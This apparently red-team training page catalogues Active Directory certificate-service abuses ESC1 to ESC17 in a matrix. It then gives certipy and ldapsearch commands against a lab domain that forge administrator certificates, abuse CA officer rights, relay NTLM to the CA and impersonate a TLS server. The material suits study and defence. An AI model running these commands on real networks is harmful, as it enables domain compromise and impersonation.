Operator On The Wire
← Back to Knowledge Base
OOTW / Chapter IV - Active Directory / 04. Techniques / ADCS

Matrix

ESCNameCore issueFirst checkAbuse shape
ESC1Enrollee-supplied subject for client authenticationRequester can supply UPN/SAN on an authentication templatecertipy find -vulnerable -enabledRequest cert as target user and authenticate
ESC2Any Purpose or no EKU templateCertificate can be used for multiple purposes, including agent-style abuseAny Purpose : True or empty EKURequest flexible cert, then chain into ESC3-style on-behalf-of request
ESC3Certificate Request AgentLow-privileged user can enroll for an enrollment-agent certificateEnrollment Agent : TrueRequest agent cert, then request cert on behalf of target
ESC4Template hijackingAttacker can modify template ACLs or sensitive template attributesUser ACL Principals on templateRewrite template into ESC1-style state, enroll, restore
ESC5Vulnerable PKI object ACLsAttacker can modify PKI trust objects in the Configuration naming contextACL review under CN=Public Key ServicesModify NTAuth, AIA, CDP, OID, or related PKI trust objects
ESC6CA allows SAN specification through request attributesCA-level SAN injection is enabledUser Specified SAN : EnabledUsually chain with ESC9 or ESC16 and request cert with target UPN/SID
ESC7Dangerous CA permissionsAttacker has Manage CA or related CA control rightsCA access rights in Certipy outputAdd officer, enable templates, approve requests, or reach CA key abuse
ESC8NTLM relay to ADCS web enrollmentWeb enrollment accepts relayed NTLM without effective EPA/channel bindingWeb Enrollment and Channel Binding in CA outputRelay coerced NTLM to /certsrv/ and request cert
ESC9No SID security extension on templateTemplate omits szOID_NTDS_CA_SECURITY_EXTNoSecurityExtension enrollment flagUPN manipulation or ESC6 chain to impersonate target
ESC10Weak Schannel certificate mappingServer allows weak UPN mapping for Schannel client cert authRegistry and Schannel mapping reviewChange UPN on controlled account, enroll cert, authenticate through LDAPS
ESC11NTLM relay to ADCS RPC interfaceCA does not enforce encrypted RPC certificate requestsEnforce Encryption for Requests : DisabledRelay coerced NTLM to rpc://CA and request cert
ESC12YubiHSM2-specific CA key exposure contextLocal access to CA plus vulnerable HSM software stackCA host and HSM reviewAbuse HSM software weakness to use or expose CA signing capability
ESC13Issuance policy linked to groupIssued certificate maps to an OID linked to an AD groupcertipy find -oidsRequest cert and receive group SID through issuance policy
ESC14Weak explicit certificate mappingWeak altSecurityIdentities mapping on accountLDAP search for altSecurityIdentitiesObtain matching certificate and authenticate as mapped account
ESC15EKUwu, CVE-2024-49019Unpatched CA accepts injected Application Policies on V1 templatesV1 template, subject supply, patch stateInject Client Authentication policy during request
ESC16CA globally disables SID security extensionCA omits SID extension from all issued certsDisabled extension OID on CASame abuse shape as ESC9 across templates issued by that CA
ESC17Enrollee-supplied subject for server authenticationRequester can supply DNS SAN on server-auth templateServer Authentication plus subject supplyRequest cert for target server name and impersonate TLS service

ESC6 with ESC9 or ESC16

certipy req -u 'student@ootw.local' -p 'student' -dc-ip 10.10.10.200 -ca 'OOTW-CA' -template ESC9 -upn administrator@ootw.local -sid '<ADMINISTRATOR_SID>' -out administrator
certipy auth -pfx administrator.pfx -domain ootw.local -dc-ip 10.10.10.200

ESC7 officer and approval pattern

certipy ca -u 'student@ootw.local' -p 'student' -dc-ip 10.10.10.200 -ca 'OOTW-CA' -add-officer student
certipy req -u 'student@ootw.local' -p 'student' -dc-ip 10.10.10.200 -ca 'OOTW-CA' -template SubCA -upn administrator@ootw.local -out administrator
certipy ca -u 'student@ootw.local' -p 'student' -dc-ip 10.10.10.200 -ca 'OOTW-CA' -issue-request <REQUEST_ID>
certipy req -u 'student@ootw.local' -p 'student' -dc-ip 10.10.10.200 -ca 'OOTW-CA' -retrieve <REQUEST_ID> -out administrator

ESC11 relay

certipy relay -target 'rpc://10.10.10.200' -ca 'OOTW-CA' -template DomainController

ESC13 OID review

certipy find -u 'student@ootw.local' -p 'student' -dc-ip 10.10.10.200 -oids -enabled -stdout
certipy req -u 'student@ootw.local' -p 'student' -dc-ip 10.10.10.200 -ca 'OOTW-CA' -template SecureAdminsAuthentication -out student_policy
certipy auth -pfx student_policy.pfx -domain ootw.local -dc-ip 10.10.10.200

ESC14 weak explicit mappings

ldapsearch -LLL -x -H ldap://10.10.10.200 -D 'ootw.local\student' -w 'student' -b 'DC=ootw,DC=local' '(altSecurityIdentities=*)' sAMAccountName altSecurityIdentities distinguishedName

ESC15 application policy injection

certipy req -u 'student@ootw.local' -p 'student' -dc-ip 10.10.10.200 -ca 'OOTW-CA' -template WebServer -upn administrator@ootw.local -sid '<ADMINISTRATOR_SID>' -application-policies 'Client Authentication' -out administrator

ESC17 server-auth request

certipy req -u 'student@ootw.local' -p 'student' -dc-ip 10.10.10.200 -ca 'OOTW-CA' -template WebServer -dns wsus.ootw.local -out wsus

Notes

These entries are a field matrix, not a replacement for validating prerequisites. Several modern ADCS abuses only become exploitable when combined with mapping mode, patch state, template version, CA flags, or a second AD control primitive.